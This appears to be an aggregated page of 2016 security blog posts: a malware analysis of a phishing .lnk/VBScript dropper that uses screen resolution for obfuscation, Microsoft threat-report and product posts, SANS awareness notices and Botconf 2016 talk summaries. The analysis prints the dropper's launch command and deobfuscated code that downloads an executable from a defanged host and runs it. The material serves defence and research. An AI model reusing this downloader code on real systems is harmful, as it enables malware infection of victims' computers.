Friday, December 23, 2016

Using Monitor Resolution as Obfuscation Technique

A quick blog post about a malicious VBScript macro that I analysed… Bad guys have always plenty of ideas to obfuscate their code. The macro was delivered via a classic phishing email with an attached zip archive that contained a Windows .lnk file. The link containing a simple call to cmd.exe with by very long “echo” line to write a VBScript file on the local disk and to execute it:

cmd.exe /c echo DATA >file.txt&&wscript //E:VBScript file.txt!%SystemRoot%\system32\SHELL32.DLL

The “DATA” dumped to file.txt have been beautified to be easily readable:

Set ak=GetObject("winmgmts:\\.\root\cimv2")
Set Kj0=ak.ExecQuery("Select * from Win32_DesktopMonitor",,48)
For Each Kj1 in Kj0
Function Kj4(SP,IV)
    Dim s2,Op,Vz,d4,BQ:BQ=""
    For d4=Vz To 1 Step -1
        If Op Then Op=1 End If
End Function

As you can see, the variable Kj5 seems to be the most interesting and contains the obfuscated code. The script starts by connecting to WMI objects on the local computer (represented by the “.”):

Set ak=GetObject("winmgmts:\\.\root\cimv2")

Then it grabs the screen resolution from the Win32_DesktopMonitor object:

Set Kj0=ak.ExecQuery("Select * from Win32_DesktopMonitor",,48)
For Each Kj1 in Kj0

This technique could be used as a sandbox detection (many sandboxes have a low resolution by default) but it’s not the case this time. The width and height are converted to integers and the first divided by the second which returns always “1”. You should have an uncommon resolution where height > width or an ultra-wide monitor to get other results. This value “1” is passed to the function Kj4() which deobfuscates the long string. The function reverses the string and processes characters one by one starting by the end (character value – 49 + 48 – which shifts all characters by one: ‘h’ becomes ‘g’, ‘o’ becomes ‘n’, etc. Finally, the string is reversed again and is ready to be executed:

set y6=createobject("scripting.filesystemobject")
set Ff=createobject("winhttp.winhttprequest.5.1")
set cI=y6.createtextfile("u.exe") "GET","hxxp://",false
for ML=1 to lenb(Ff.responsebody)
    cI.write chr(ascb(midb(Ff.responsebody,ML,1)))
set y6=Nothing
set Ff=Nothing
set cI=Nothing
Set objShell=CreateObject("WScript.Shell")
Set objExec=objShell.Exec("u.exe")
Set objShell=Nothing

A classic HTTP connection is performed to drop the payload from a compromised server. Note that the macro did not work in my Windows 10 sandbox (empty values are returned instead of the screen width/height) but it worked with Windows 7.


[The post Using Monitor Resolution as Obfuscation Technique has been first published on /dev/random]

from Xavier

Wednesday, December 14, 2016

Microsoft Security Intelligence Report Volume 21 is now available

The latest volume of the Microsoft Security Intelligence Report is now available for free download at

This new volume of the report includes threat data from the first half of 2016 as well as longer term trend data on industry vulnerabilities, exploits, malware, and malicious websites. The report also provides specific threat data for over 100 countries/regions.

Our Featured Intelligence content for this volume of the report includes three deep dive sections:

Protecting cloud infrastructure; detecting and mitigating threats using Azure Security Center:
As organizations move workloads to cloud-based services it is important that security teams keep abreast of changes in their threat posture. New threats can be encountered when adopting solutions that are fully cloud based, or when connecting on-premises environments to cloud services. This section of the report details common threats that organizations may encounter, and explains how security teams can use Azure Security Center to protect, detect, and respond to security threats against Azure cloud-based resources.

PROMETHIUM and NEODYMIUM: parallel zero-day attacks targeting individuals in Europe:
Microsoft proactively monitors the threat landscape for emerging threats, including observing the activities of targeted activity groups. The new report chronicles two activity groups, code-named PROMETHIUM and NEODYMIUM, both of which target individuals in a specific area of Europe. Both attack groups launched attack campaigns in May 2016 using the same zero-day exploit to seek information about specific individuals. Microsoft is sharing information about these groups to raise awareness of their activities, and to help individuals and organizations implement existing mitigation options that significantly reduce risk from these attack groups and other similar groups.

Ten years of exploits: a long-term study of exploitation of vulnerabilities in Microsoft software:
Microsoft researchers conducted a study of security vulnerabilities and the exploitation of the most severe vulnerabilities in Microsoft software over a 10-year period ending in 2015. In the past five years vulnerability disclosures have increased across the entire industry. However, the number of remote code execution (RCE) and elevation of privilege (EOP) vulnerabilities in Microsoft software has declined significantly. The results of the study suggest that while the risk posed by vulnerabilities appeared to increase in recent years, the actualized risk of exploited vulnerabilities in Microsoft software has steadily declined.

There is a lot of other new data in this report that I hope you’ll find useful.

You can download Volume 21 of the Microsoft Security Intelligence Report at

Ken Malcolmson
Executive Security Advisor, Microsoft Enterprise Cybersecurity Group

from Microsoft Secure Blog Staff

[SANS ISC Diary] UAC Bypass in JScript Dropper

I published the following diary on “UAC Bypass in JScript Dropper“.

Yesterday, one of our readers sent us a malicious piece of JScript: doc2016044457899656.pdf.js.js. It’s always interesting to have a look at samples coming from alternate sources because they may slightly differ from what we usually receive on a daily basis. Only yesterday, my spam trap collected 488 ransomware samples from the different campaigns but always based on the same techniques… [Read more]

[The post [SANS ISC Diary] UAC Bypass in JScript Dropper has been first published on /dev/random]

from Xavier

"Mobile Device Security"

  Editor's Note: This post on mobile device security was originally posted to the SANS Penetration Testing blog by our colleagues Lee Neely & Joshua Wright. It's a good reminder of some key mobile security practices and helpful to raise awareness about simple behaviors that can make a difference. We often get asked for things … Continue reading Mobile Device Security

from Securing the Human

Friday, December 9, 2016

Cybersecurity norms challenge remains

Despite the differences that exist between governments, there is a growing recognition around the world that attacks on the security and stability of the Internet threaten all nations’ interests. The reality driving this alignment is that both emerging and developed economies are internet-dependent and, equally significantly, that malicious actors can use ubiquitous technologies to attack critical systems and infrastructure.

While cybercrime by non-state actors must be dealt with, it is also increasingly clear that governments need to carefully consider the impacts of their own military and intelligence actions in cyberspace, as well as those of their peers. Without some norms of state behavior in cyberspace the world could experience weakening of international security, national security, and even public safety. The potential erosion of trust citizens, consumers, and businesses have in globally interconnected information technology systems could significantly undermine our global economy.

Against this background, the United Nations Group of Governmental Experts (UN GGE) began its next round of discussions on cybersecurity norms and confidence building measures in New York at the end of August. This new session, due to report back to the UN General Assembly in September 2017, will have to tackle a wide range of thorny issues, one of which will be the question of applicability of international law to cyberspace. How can concepts such as “use of force” be applied? How should cyberweapons be classified – as conventional weapons, weapons of mass destruction, or something else? And, as if these questions weren’t complex enough, the UN GGE is going to have to consider valid ways to handle non-state actors or quasi-non-state actors when they threaten a nation’s critical systems.

The re-convening of the UN GGE also represents an opportunity to take stock of the norms debate so far, as well as to explore the different roles government and private sector could play in enhancing global online security. Microsoft has for some time argued that a decision-making framework is needed to help governments balance their roles as users, protectors, and exploiters of the internet. This is not an easy task for governments as they can be confronted with seemingly conflicting priorities, e.g. securing immediate economic advantages or ensuring longer-term growth of a digital economy.

Two years ago, Microsoft set out our own proposals around a cyber-norms framework. Our view, then and now, is that government decisions should be interrogated through the lens of the various actors in cyberspace. Each actors’ objectives, the actions they could take in pursuit of those objectives, and the potential impacts of a particular decision all need to be considered. Framed this way, the norms conversation can become more precise, focusing on discussing acceptable and unacceptable objectives, which actions may be taken in pursuit of those objectives, what the possible impacts of those actions are, and whether they are acceptable for a civilized, connected society.

Microsoft will, of course, make what contributions we can to the UN GGE and the other processes taking place to build a secure and lasting global approach to cyberspace. Our collective progress towards that goal can, I think, be judged against four key criteria. First, the approach must be practicable, rather than technically very challenging to achieve. Second, risks from complex cyber events and disruptions that could lead to conflict should be demonstrably reduced. Third, observable behavioural change needs to occur, change that clearly enhances the security of cyberspace for states, enterprises, civil society, and individual stakeholders and users. Fourth, and finally, existing risk-management concepts should be harnessed to help mitigate against escalation or to manage the potential actions of involved parties if escalation is unavoidable. Only when these criteria, or ones much like them, are met can the world feel confident in the future of the Internet, and in the economies and societies that are now dependent upon it.

from Paul Nicholas

Wednesday, December 7, 2016

"OUCH is Out - Securely Disposing of Your Mobile Devices"

The Decemberedition of the OUCH! security awareness newsletter is out. For this month we focus onSecurely Disposing of Your Mobile Devices. We chose this topic as the holidays is when many people get a new mobile device, leaving them with the challenge of what to do with their old one. It does not matter if … Continue reading OUCH is Out - Securely Disposing of Your Mobile Devices

from lspitzner

"Nudging Towards Security"

Editor's Note:This is a part of a series of blog posts by Sahil Bansal from Genpact on the topic "Nudging Towards Security". My first post emphasized why security should be really easy if we want people to do it. It also highlighted the importance of security being proactive since a lot of security incidents involve … Continue reading Nudging Towards Security

from lspitzner

Tuesday, December 6, 2016

How much time do you spend on false security alerts?

The latest data on global threats—from malicious websites and untrusted IPs to malware and beyond—can help a company detect threats and rapidly respond. The challenge is that threat intelligence feeds are, at best, uneven in quality.

Close to 70 percent of information security professionals say current threat feeds have a significant issue with timeliness, and only 31 percent rated their threat intelligence as very accurate.

This lack of accuracy means IT staff must deal with vetting the feeds themselves. And this not only takes time, it takes IT resources: 68% of security professionals say their time is consumed chasing down false alerts and sifting through more than 17,000 malware alerts each week.

The solution to reducing this flood of data to only the most relevant alerts is not less data, it’s better data. There are three key areas to helping your security team become more efficient, and the security solution within Operations Management Suite (OMS) can help you with each.

  • Increase the diversity, scale, and variety of data
  • Implement machine learning and behavioral analytics
  • Utilize simple tools that make mitigation more efficient


The Operations Management Suite dashboard gives you a comprehensive and holistic view of all your environments, helping you turn raw data into actionable insights.

Microsoft Threat Intelligence: a global view of the threat landscape

To start, you must have the right data from a diverse spectrum of sources to get a true understanding of what is happening. Microsoft Threat Intelligence gathers data from the entire Microsoft footprint.

We have trillions of data points coming in from billions of endpoints, and it’s that ability to understand and gain insight and take action based on that data that can make the difference,” said Brad Smith, President and Chief Legal Officer for Microsoft.

In addition to this, between our Digital Crimes Unit (DCU), the Cyber Defense Operations Command Center (CDOC), and the greater company, we employ thousands of the smartest security experts to protect our environments like Azure and Office 365. Through OMS, we share the information they gather with you, giving you unparalleled insights into the rapidly evolving threat landscape.

Analytics: Separate the signal from the noise

Operations Management Suite collects data from across your datacenters—Windows, Linux, Azure, on-premises, and AWS—and correlates it with the latest Microsoft threat intelligence to detect attacks targeting your organization. Not a list that is days old, but one that is updated in real time. It also applies behavioral analysis and anomaly detection to identify new threats, which align to known patterns of attack. You are provided with a list of the most pressing issues, immediately actionable and conveniently prioritized by the potential threat they pose.


A visual map of network traffic to known malicious IP addresses lets you quickly find and understand where real threats lie.

Tools: Take swift and efficient action

The demand for qualified information security staff has never been higher. In 2016, one million information security openings are expected worldwide.4 While we can’t directly help you with hiring more security personnel, the threat intelligence within Operations Management Suite empowers your IT resources to be more efficient and helps reduce the time it takes to identify and respond to cyberthreats.

For example:

Operations Management Suite detects one of your computers communicating with known malicious IPs. The outgoing traffic is particularly alarming. With just a few clicks you can:

  • Isolate that specific machine
  • Block communication network-wide to the IPs
  • Use rapid search to find other actions taken by the attacker anywhere in your network

Learn more about Operations Management Suite and our approach to security.

To find out how attackers are targeting organizations today, read Anatomy of a Breach.

from Microsoft Secure Blog Staff

"Take The SANS Security Awareness Survey"

We are very excited to announce the annual SANS Security Awareness Survey. Once a year, every year, we take a snapshot of the global security awareness community and create a report that you can use to benchmark and improve your security awareness program (download the last report here). What makes this annual report so powerful … Continue reading Take The SANS Security Awareness Survey

from lspitzner

Saturday, December 3, 2016

Botconf 2016 Wrap-Up Day #3

It’s over! The 4th edition of Botconf just finished and I’m in the train back to Belgium writing the daily wrap-up. Yesterday, the reception was organized in a very nice place (the “Chapelle de la Trinité”). Awesome place, awesome food, interesting chats as usual. To allow people to recover smoothly, the day started a little bit later and some doses of caffeine.

The day was kicked off by Alberto Ortega with a presentation called “Nymaim Origins, Revival and Reversing Tales”. Nymaim is a malware family discovered in 2013 mainly used to lock computers and drop ransomware. It was known to be highly obfuscated and to use anti-analysis techniques (anti-VM, string description on demand, anti-dumping, DGA, campaign timer). During the analysis of the code, a nice list of artefacts was found to detect virtualized environments (ex: “#*INTEL – 6040000#*” to detect the CPU used by VMware guests). Alberto reviewed the different obfuscation techniques. In the code obfuscation, they found a “craft_call” function to dynamically calculate a return address based on an operation with the two hard-coded parameters. Campaign timer is also classic for Nymaim: There is a date in the code (20/11/2016) which will prevent the malware to execute after this date (the system date must be changed to permit the execution of the malware, which is not easy on a sandbox). Network traffic is encrypted with different layers. The first one is encrypted with RC4 with the static key and a variable salt for each request/response. The DNS resolution is also obfuscated. Domains are resolved using a homemade algorithm. “A” records returned are NOT the actual IP addresses. (Google DNS are used). To know the real IP address, the algorithm must be used. Of course, DGA is used of course. It uses PRNG based on Xorshift algorithm Seeded with the current system time and a fixed seed. Nymaim is used to perform banking fraud. The way this feature is configured is similar to Gozi/IFSB (that will be covered later today). They use redirects to the injects panel. Nice review of the malware with an amazing job to reverse and understand all the features.

Then Jose Miguel Esparza and Frank Ruiz presented “Rough Diamonds in Banking Botnets”. Criminals keep improving their backends : C&C’s and control panels. They made a nice review of the current landscape but this talk was flagged as TLP:RED so no more information.

After a coffee break, we restarted with Maciej Kotowicz who presented “ISFB, Still Live and Kicking”. Also named Gozi2/Ursnif, ISFB is a malware which appeared in 2014 and is, still today, one of the most popular bankers on the market. Why this name? “ISFB” string was found in debugging instruction in the code. Targets are numerous (all over the world). The dropper performs persistency, inject worker, setups IPC and (new!) download the 2nd stage. It also has anti-VM tricks. It uses GetCursorInfo() to get the movement of the mouse. No movement, no execution! It also enumerates devices. Then Maciej reviewed deeper how the malware works, its configuration and registry keys. Communications to phone home are based on the Tor network and P2P network and a DGA of course.

The next slot was assigned to Margarita Louca with a non-technical talk: “Challenges for a cross-jurisdictional botnet takedown”. Margarita being from Europol, she also asked to consider her presentation as TLP:RED.

The afternoon started with two last talks. Kurtis Armour presented “Preventing File-Based Botnet Persistence and Growth”. The goal of this talk was education of threat landscape and the layers of protection. The most part of his talk focused on post-exploitation (only on classic computers – No IoT). Botnet delivery mechanism is based on social engineering, tricking users to go unsafe source and to gain some money (monetise) or via browsers, 3rd party apps (EK), this was already covered. Dropped code can be file based or memory based. Starting from the fact that code is made to be executed by the computer, Kurtis reviewed how this code can be executed by a Windows computer. The code can be a binary, shell code or a script. This code must be dropped on the victim by a dropper and they are many way to achieve that! Via HTML, JavaScript, ZIP, EXE, DLL, Macros, PowerShell, VBA, VBS, PDF, etc. The talk was mainly defensive and Kurtis explained with several examples how to prevent (or at least reduce the chances) code execution. First golden rule: “No admin rights!“. But we can also use pieces of software to reduce the attack surface. A good example is LAPS from Microsoft. Windows Script Files are a pain. Don’t allow their execution. This can be achieved by replaced the default association (wscript.exe -> notepad.exe). Microsoft Office files are well known to be (ab)used to distribute macros. Starting with Office 2016, more granularity has been introduced via GPO’s. Here is an interesting document about the security of macros published (source)

Office Macros Security

PowerShell is a nice tool for system administrator but also very dangerous: it runs from memory, download & exec from remote systems. But powershell is harder to block. Execution policies can be implemented but are easy to bypass. Powershell v5 to the rescue? Improved logging and security features (but don’t forget to uninstall previous versions). Application whitelisting to the rescue? (the talk focused on AppLocker because being by default and can be managed via GPO’s). It can be used to perform an inventory of the applications, to protect against unwanted applications and increase software standardisation. Another technique is to restrict access to writable directories like %APPDATA% but they are many others. hta files are nasty and are executed via a specific interpreter (mshta.exe). There are many controls that could be implemented but they are really a pain to deploy. There was an interesting question from somebody in the audience: Who’s using such controls (or at least a few of them). Only five people raised their hand!

And finally, Magal Baz & Gal Meiri closed the event with another talk about Dridex: “Dridex Gone Phishing”. After a short introduction about Dridex (or a recap – who don’t know this malware?), they explained in details how the banking fraud is working from the infection to the fraudulent transaction. You have a token from your bank? 2FA? Good but it’s not a problem for Dridex. It infects the browser and places hooks in ouput and input functions of the browser and all data is duplicated (sent to the bank and the attack. This is fully transparent to the user. A good way to protect yourself is to rename your browser executable (ex: “firefox_clean.exe” instead of “firefox.exe”). Why? Dridex has a list of common browsers process names (hashed) and compromize the browser based on this list.

As usual, there was a small closing session with some announcements. A few numbers about the 2016 edition? 325 attendes, 4 workshops, 25 talks (out of 48 proposals). And what about the 2017 edition? It should be organized in Montpellier, another nice French city between 5th and 8th of December.


[The post Botconf 2016 Wrap-Up Day #3 has been first published on /dev/random]

from Xavier

Friday, December 2, 2016

Botconf 2016 Wrap-Up Day #2

The second is over, so here is my daily wrap-up! After some welcomed coffee cups, it started sharp at 9AM with Christiaan Beek who spoke about Ransomware: “Ransomware & Beyond”. When I read the title, my first reaction was “What can be said in a conference like Botconf about ransomware?”. I was wrong! After a short review of the ransomware landscape, Christiaan went deeper of course. It’s a fact: The number of ransomware really exploded in 2016 with new versions or techniques to attack and/or evade detections mechanisms. Good examples are Petya which encrypts the MBR or Mamba which performs FDE (“Full Disk Encryption“). We also see today “RaaS” or “Ransomware as a Service“. Not only residential customers are targeted but also business users (do you remember the nice story of the hospital in the US which was infected?). Why remains ransomware so successful?

  • It’s an organised crime with affiliate program
  • Open source code available
  • Buying is easy (aaS)
  • Customer satisfaction

What does Christiaan means by “Customer satisfaction”? On many forums, we can find thankful messages from victims towards the attackers for providing the decryption key once they paid the ransom. This could be compared to the Stockholm syndrome. We see also services like Ransomware for dummies where people are able to customise the warning messages and so customise their campaign. An important remark was that, sometimes, ransomware is used like DDoS as a lure to keep security teams attention while another attack is ongoing, below the radar.

Then, Sebastiaan explained how he tried to implement machine learning to help in the detection/categorisation of samples but it stopped to work when attackers started to use Powershell. The memory analysis approach remains interesting but consumes a lot of resources. They are interesting initiative to improve our daily fight against ransomware: McAfee released a tool called “Ransomware Interceptor” that gives good results. An nice initiative is the website which compiles a lot of resources (how to report an incident, how to decrypt some ransomware – tools are available).  What about the future? According to Christiaan, it’s scaring! Ransomware will target new devices like home routers or… your cars! Cars look a nice target when their CAN bus is directly available from the entertainment system! Be prepared! A very nice talk to start the day!

The second talk was about Moose! “Attacking Linux/Moose 2.0 Unraveled an EGO MARKET” by Olivier Bilodeau and Masarah Paquet-Clouston. Yes, Moose is back! This was already covered during Botconf 2015. So, its started with a quick recap: Moose infects routers and IoT devices running an embedded Linux with a BusyBox userland. Once infected, the worm tries to spread by brute forcing credentials of new potential victims. The installed payload is a proxy service used to reach social media websites. So, the question was “What are the attackers doing with this botnet? How do they monetize it?“. The next was to attack the botnet to better understand the business behind it. To achieve this, a specific honeypot environment was deployed. A real machine (based on Linux ARM) was deployed with other components like Cowrie. By default cowrie has no telnet support. So, they contributed to the project and added telnet support. The next step was to break communications with the C&C. This was also explained, it was based on mitmproxy. What about their findings?

  • The botnet remains stealthy (no x86 version), no add fraud, spam or DDoS, no persistence mechanism
  • It is constantly adapting
  • It uses obfuscated C&C IP addresses (XORd with a static value in the binary)
  • Update bot enrolment process (with more correlation checks)
  • Protocols updated (real HTTP and less easy to spot)

As the botnet has no direct victimes, how is it used? Social media fraud is the key! This kind of fraud proposes you to buy “clicks” or “followers” with a few bucks. Instragram is the main targeted social network with 86% of the bot traffic. Masarah explained that this business is in fact very lucrative. But who are the buyers of those services?

Buy Instagram Followers

Based on the people followed by Moose fake accounts, we may found:

  • Business related accounts (like e-cigarette vendors)
  • Business related account but represented by one individual (ex: people looking for business)
  • Celebrities expecting more visibility.

So, indeed, no direct victims but some get fooled by the “false popularity”. What about the prices? They were analysed and they’re differences: Instagram is cheaper than LinkedIn. Who’s being Moose? They identified 7 IP addresses, 3 languages used (Dutch, English and Spanish) and, at least, 7 web interfaces. It was a nice talk with a good balance between technical and social stuff. I liked it. If you’re interested, two interesting links about Moose:

  • IOC’s are available here
  • The paper is available here

Then, John Bambenek came on stage to present “Tracking Exploit Kits”. The first question addressed by John was “Why tracking exploit kits?”. Indeed, when one is brought down, another comes alive. Law enforcement services are overloaded. Because they are one of the major way to infect computers (the other one being spam). An EK can be seen as an ecosystem. Many people work around it: operators, exploit writers, traffic generators, sellers, mules, carders, … There is only one way to protect yourself about EK’s: patch, patch and patch again. Rarely 0-day vulnerabilities are used by EK so you don’t have a good reason to not install patches. Also, the analyse of an EK may reveal very interesting stuff to better understand how they are operated. The second part of the talk covered techniques (and tools) to track EK’s. Geo-blacklisting is a common feature used by most of the EK (not only countries but also sensitive organsations are blacklisted like AV vendors or companies doing research). But VPN are not always properly detected so use a VPN! As each EK has its own set of exploits to test, you must tune your sandbox to be vulnerable to the EK you are analysing. Note that many EK pages can be identified via patterns (regex are very useful in this case). Then, John covered the landing pages and how to decode them. He also mentioned the tool ekdeco which can be very helpful during this task. If you’re interested in IOC’s, the following URLs has many ones related to exploit kits: Again, a very nice talk for the first part of the day.

The next topic covered DDoS botnets and how to track them. Ya Liu’s presentation was called “Improve DDoS Botnet Tracking With Honeypots”. In fast, Ya’s research was based on PGA or “Packet Generation Algorithm“. During his research, he found that a Botnet family can be identified by inspecting how packets are generated. It was a nice research with a huge data set: 30+ botnet families, 6000+ tracked botnets, 250K+ targets (it started in 2014). Ya’s goal is to collect packets during attacks and, based on the analysis, to map them to the right family. He explained how packets are generated and the identification is due to bad programming. Then algorithm to analyse data and extract useful info was reviewed. Interesting approach but the main issue is to find enough and good packets.

The first half-day ended with Angel Villega who presented “Function Identification and Recovery Signature Tool” or, in short, “FIRST“. The idea behind this project is to improve the daily life of malware researchers by automatic boring stuff. We don’t like boring tasks right? Here again, the goal is to analyse a sample to tag it with the right family. FIRST is an IDApro plugins which extracts interesting information from functions found in the malware samples (opcodes, architecture, syscalls, …) and send them to a server which will check the information in his database to help to identify the malware. Why does it work? Because people are lazy and don’t want to reinvent the wheel. So chances to find shared functions in multiple samples are good. As a kick-off for the project, there is a public server available ( It can be used as a first repository but you can also start your own server. Nice project but less interesting for me.

After the lunch break, Tom Ueltschi came on stage to present “Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk)”. Tom is a regular speaker as botconf and, this year again, he came with nice stuff that can be re-used by most of us. First, he made an introduction about detection techniques. It is very important to deploy the right tools to collect interesting data from your infrastructure. Basically, we have two types:

  • NBD or network based detection
  • HBD or host base detection

For Tom, the best tools are: Bro as NBD and SysmonSplunk as HBD. I agree on his choices. Why Sysmon? Basically, it’s free (part of the SysInternals suite) and, being developed by Microsoft, it is easy to deploy it and integration is smooth. It logs to the Windows Event Logs. Tom research started with a presentation he attended at RSA with the author of Sysmon. The setup is quite simple:

Sysmon > Windows Event Logs > Splunkforwarder > Splunk

Just one remark: take care of your Splunk license! You may quickly collect tons of events! It is recommended to filter them to just collect the ones interesting for your use cases. The second part of the presentation covered such use cases. How to start? The SANS DFIR poster is often a good starting point. Here are some examples covered by Tom:

  • Tracking rogue svchost.exe: Always executed from the same path and MUST be executed with a ‘-k’ parameters. If it’s not the case, this is suspicious.
  • Detection of Java Adwind RAT
  • Advanced Hancitor (referring to Didier Stevens’s SANS diary)

It is also possible to perform automatic malware analysis, to detect key loggers and password stealers, lateral movements (why a workstations has flows with another one via TCP/445?). It is also interesting to keep an eye on parent / child processes relationship. And a lot of interesting tips were reviewed by Tom. For me, it was the best talk of the day! If you’re working in a blue team, have a look at his slides asap.

Sébastien Larinier & Alexandra Toussaint presented “How Does Dridex Hide Friends?”. They presented the findings of an investigation they performed at one of their customers. He suffered of a major bank fraud (800K€!). The customer was “safe”, had 2FA activated but it was compromised and asked to find “how?”. They reviewed the classic investigation process which started with a disk image that was analysed. What they found, how, the artefacts etc. The first conclusion was that the computer was infected by Dridex. But 6 days later, another suspicious was created which dropped a RAT on the computer. Nice example of a real infection (I was surprised that the customer accepted to be taken as an example for the talk).

And the afternoon continued with “A Tete-a-Tete with RSA Bots” by Jens Frieß and Laura Guevara. Here again, the idea of the talk was to automate the analyse of encrypted communications between a bot and its C&C. When you are facing encryption every day, it may quickly become a pain. The good news for the research was that there is not a log of changes in encrypted communications across malware families. Also, bad guys are following best practices and rely on standard encryption libraries. The analyse process was reviewed to be able to decrypt communications: It is based on a fake C&C with a rogue certificate, a DNS server to spoof requests and the injection of a DLL with cryptographic functions.

After a quick coffee break, the next presentation was “Takedown client-server botnets the ISP-way” by Quảng Trần who is working for a Vietnamese ISP. Takedowns are important countermeasures in fighting botnets. Why is it so important from an ISP perspective? Because they need to protect their customers, their network and also respond to local law enforcement agencies requests. Quang explained the technique used to bring a botnet down: Once the IP & domains have been identified, the ISP can re-buy expired domains or perform domain / hosting termination. In this case, the major issue is that some ISP’s are not always reactive. But for an ISP, it can be interesting to maintain the DNS, monitor the traffic, reroute it or perform DPI. The technique used is a sinkhole server that can serve multiple botnets via their own protocols and mimic their C&C via a set of plugins. With this technique, they can fake the C&C and send termination commands to the bots to bring the botnet down in a safe way. Interesting remark during the Q&A session: such kind of operation is illegal in many countries!

For the next talk, the topic was again “automation” and “machine learning“. Sebastian Garcia presented “Detecting the Behavioural Relationships of Malware Connections”. The idea of his research is not rely only on IOC’s (that the only real info that we have today to fight against malwares and botnets). But, it is not performant enough with new malwares. Sebastian’s ideas was to put more interests on network flows. Sometimes it can help but not always. What about checking the behaviour? He explained his project which produces indeed nice graphs:

Traffic Behaviour

It was not easy for me to follow this talk but the information shared looked very interesting. More information is available here.

The last talk had an attractive title: “Analysis of Free Movies and Series Websites Guided by Users Search Terms” by Martin Clauß and Luis Alberto Benthin Sanguino. The idea is to evaluate the risk to visit FMS websites. FMS means “Free Movies and Series“. They are juicy targets to deliver malicious content to the visitors (millions of people visit such websites). The idea was to collect URLs visited while browsing to such websites and check if they are malicious or not. Classic targets are Flash Players but they are many others. How to reach FMS websites? Just search via Google. Search for your favourite singer, the latest Hollywood movie. The x first results were crawled and analysed via online tools like VT, Sucury, ESet, etc. The results are quite interesting. As you can imagine, a lot of web sites redirect to malicious content. Based on 18K pages analised, 7% were malicious (and 10% of the domains). Other interesting stats were reported like the singer which returned the biggest amount of malicious page or who’s most targeted (Spanish people). Nice talk to finish the day.

Before the official reception,  a lightning talks session was organised with 10 x 3 minutes about nice topics. That’s enough for today, seen you tomorrow with more content!

[The post Botconf 2016 Wrap-Up Day #2 has been first published on /dev/random]

from Xavier

Security in agile development

This post is authored by Talhah Mir, Principal PM Manager, WWIT CP ISRM ACE

Most enterprises’ security strategies today are multifaceted – encompassing securing a variety of elements of their IT environment including identities, applications, data, devices, and infrastructure. This also includes driving or supporting security training and changes in culture and behavior for a more secure enterprise. But, security really starts at the fundamental core, at the software development level. It’s here that security can be “built in” to ensure that applications meet the security requirements of enterprises today and are aligned to a holistic, end to end security strategy.

We recently published a white paper titled, “Security for Modern Engineering,” which outlines some of the security best practices and learnings we have had on our journey to support modern engineering.  Software engineering teams everywhere are trying to achieve greater effectiveness and efficiency as they face climbing competitive pressures for differentiation, and constantly evolving customer demands. This is driving the need for significantly shorter time-to-market schedules that don’t compromise on the quality of software applications and services. To address this demand, modern engineering teams like those in Microsoft IT, are adopting agile development methodologies, embracing DevOps (a merging of development and operations), and maintaining development infrastructure that support continuous integration/continuous delivery. Today, a more secure application can be a differentiator as users of applications are becoming more aware and concerned about security.

There has never been a better time to push security automation and develop integrated security services for engineering teams as they think about operating in a modern engineering environment. Similar to how development, test, and operation roles have merged to shape today’s modern engineer, we, at Microsoft, continue to believe that a software security assurance program can yield much better results if the processes are baked seamlessly into the engineering process. This is what we advocated with the development of Microsoft Security Development Lifecycle (SDL) which to this day, continues to be a priority for a modern engineering practice. Security teams should leverage the momentum of automation to further enhance the security posture of their line-of-business application portfolio within their organization – helping to drive an effective, efficient, and competitive business.


from Microsoft Secure Blog Staff

Botconf 2016 Wrap-Up Day #1

This is already the fourth edition of the Botconf security conference, fully dedicated to fighting malware and botnets. Since the first edition, the event location changed every year and it allowed me to visit nice cities in France. After Nantes, Nancy and Paris, the conference invaded Lyon. I arrived yesterday in the evening and missed the workshop (four of them were organised the day before the conference). The first started smoothly with coffee and pastries. What about this edition? Tickets were sold out for a while (300 people registered) and the organisation remains top. Eric Freysinnet did the open session with the classic information about the event. About the content, there is something important at Botconf: some talks contains touchy information and cannot be disclosed publicly. The organisers take the TLP protocol seriously. Each speaker is free to refuse to be recorded and his/her presentation to be covered on Twitter or blog (this is part of their social media policy. Of course, I’ll respect this. Last Eric’s remark: “No bad stuff on the wifi, there are some people from French LE in the room!😉

After Eric’s introduction, the first slot was assigned to Jean-Michel Picot from Google (with the collaboration of many others Googlers) who presented “Locky, Dridex, Recurs: the Evil Triad”. He presentation how those malicious codes are seen from a Gmail perspective. As said above, I respect the speaker’s choice: this talk was flagged as TLP:RED. It was interesting but (too?) short and some questions from the audience remained unanswered by the speaker/Google. More information could be found about their research here. For me, nothing was really TLP:RED, nothing touchy was disclosed.

The next talk was called “Visiting the Bear’s Den” by Jean-Ian Boutin, Joan Calvet and Jessy Campos (the only speaker present on stage). The “Sednit” group (also known as APT28, Fancy Bear or Sofacy) has been active since 2004. It is very active and famous.The analysis of Sednit started with a mistake from the developers: they forgot to set the “forgot” field on The URL shortener service was indeed used to propagate their malicious links. Basically, Sednit uses an ecosystem based on tens of software components like RAT’s, backdoor, keyloggers, etc). To explain how Sednit works, Jessy had a good idea to tell the story of a regular user called Serge. Serge is working for a juicy company and could be a nice target.

09:30 AM, Monday morning, Serge arrives at the office and reads his emails. In one of them, there is a link with a typo error and an ID to identify the target. Serge meets then SEDKIT (the exploit kit). On the landing page, his browser details are disclosed to select the best exploit to infect him. Serge’s computer is vulnerable and he visits the SEDNIT Exploit Factory. The exploit downloads a payload and Serge meets now the SEDUPLOADER. The dropper uses anti-analysis techniques, drops the payload, performs privilege escalation and implements persistence.

10:00 AM: Serge is a victim. SEDRECO deployment.

02:00 PM: Serge meets XAGENT (the modular backdoor). At this step, Jessi explained how communications are performed with the C&C. It works via SMTP. Messages are sent to created or stolen mailboxes and the C&C retrieves the messages:

Victim > SMTPS > < POP3S < C&C > SMTPS > < POP3S < Victim

What’s happening during the next three days? Modules are executed to steal credentials (via Mimikatz!), registry hives are collected. Note that multiple backdoors can be installed for redundancy purposes. Finally, lateral movement occurs (pivoting)

Friday, 11:00AM, long term persistence is implemented via a rogue DLL called msi.dd which is used by Microsoft Office. When an Office component is started, the rogue DLL is loaded then loads the original one (they offer the same functions). Finally, the DOWNDELPH bootkit was explained. This was a very interesting talk with many information. For more information, two links: the research paper and a link to Sednit IOC‘s if you are interested in hunting.

After the lunch break (which was very good as usual at Botconf), Vladimir Kropotov and Fyodor Yarochkin presented “LURK – The Story about Five Years of Activity”. Sednit was covered in the morning and this talk was almost the same but about “LURK“. It is a banking trojan targeting mainly Russia and the group behind it is active for a few years. The research was based on the analyse of proxy logs. It was first detected in 2011 and was the first to have a payload residing in memory (no traces, no persistence). It is easy to identify because malicious URLs contains the following strings:

  • /GLMF (text/html)
